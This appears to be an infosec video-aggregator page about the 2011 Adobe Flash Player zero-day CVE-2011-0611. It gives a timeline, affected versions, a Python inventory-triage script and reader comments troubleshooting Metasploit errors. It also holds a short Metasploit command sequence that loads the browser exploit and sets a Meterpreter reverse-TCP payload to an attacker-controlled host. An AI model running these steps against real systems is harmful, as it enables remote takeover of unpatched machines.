Description: Timeline :
Vulnerability discovered while being exploited in the wild
First information about the 0day published on 2011-04-11
Security Advisory APSA11-02 posted by the vendor on 2011-04-11
First vulnerability analysis provided on 2011-04-11
Vendor update provided on 2011-04-15
Metasploit PoC provided by sinn3r on 2011-04-15
PoC provided by:
Unknown
sinn3r
Reference(s) :
CVE-2011-0611
APSA11-02
OSVDB-71686
Affected versions :
Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux
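Added example (not part of the original post or the Metasploit module): a small inventory triage against the affected-version list above. It shows why each channel needs its own ceiling, since the Chrome and Android builds are numerically higher than the desktop ceiling; the inventory format, host names and sample versions are constructed for illustration.

```python
import re

# Highest affected build per channel, copied from the "Affected versions" list.
AFFECTED_CEILING = {
    ("flash", "desktop"): (10, 2, 153, 1),   # Windows, Macintosh, Linux, Solaris
    ("flash", "chrome"): (10, 2, 154, 25),   # Flash Player for Chrome users
    ("flash", "android"): (10, 2, 156, 12),
    ("air", "desktop"): (2, 6, 19120),       # Windows, Macintosh, Linux
}

def parse_version(text):
    """Turn '10.2.153.1' or '10,2,153,1' into a tuple of ints; None if malformed."""
    parts = re.split(r"[.,]", text.strip())
    if not all(p.isdigit() for p in parts):
        return None
    return tuple(int(p) for p in parts)

def is_affected(product, channel, version):
    """True or False for a listed channel; None when the record cannot be judged."""
    ceiling = AFFECTED_CEILING.get((product.lower(), channel.lower()))
    parsed = parse_version(version)
    if ceiling is None or parsed is None:
        return None
    # Pad with zeros so a short version such as '2.6' compares as 2.6.0.
    width = max(len(ceiling), len(parsed))
    pad = lambda v: v + (0,) * (width - len(v))
    return pad(parsed) <= pad(ceiling)   # "and earlier" means <= ceiling

def triage(lines):
    """Map each 'host product channel version' record to a verdict string."""
    labels = {True: "affected", False: "not listed", None: "unknown"}
    report = {}
    for line in lines:
        fields = line.split()
        if len(fields) == 4:
            host, product, channel, version = fields
            report[host] = labels[is_affected(product, channel, version)]
    return report

SAMPLE_INVENTORY = [  # constructed records, not real hosts
    "ws-01 flash desktop 10.2.153.1",
    "ws-02 flash chrome 10.2.154.25",   # above the desktop ceiling, still affected
    "ws-03 flash chrome 10.2.154.99",
    "ph-01 flash android 10.2.156.12",
    "ws-04 air desktop 2.6.19120",
    "ws-05 flash desktop not-reported",
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_INVENTORY).items():
        print(host, verdict)
```

"not listed" only means the build is newer than the ceiling given on this page; confirm the fixed build for each channel against APSA11-02 before closing a record.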
Tested on Windows XP SP3 with :
Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1
Description :
This module exploits a vulnerability in Adobe Flash Player that was discovered while being actively exploited in the wild. When a specially crafted .swf file is embedded, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory and results in arbitrary code execution.
Metasploit demo :
use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
Tags: metasploit, adobe, flash
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
How do I fix this? :
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.159.129:4444
[*] Started revers handler on 0.0.0.0:4444
[-] Exploit excpetion: The address is already in use (192.169.159.129:8080).
Please, help me!
Thanks.
i think ya setup local server in ya pc... off tat server and do again
thanks zatan for video :)!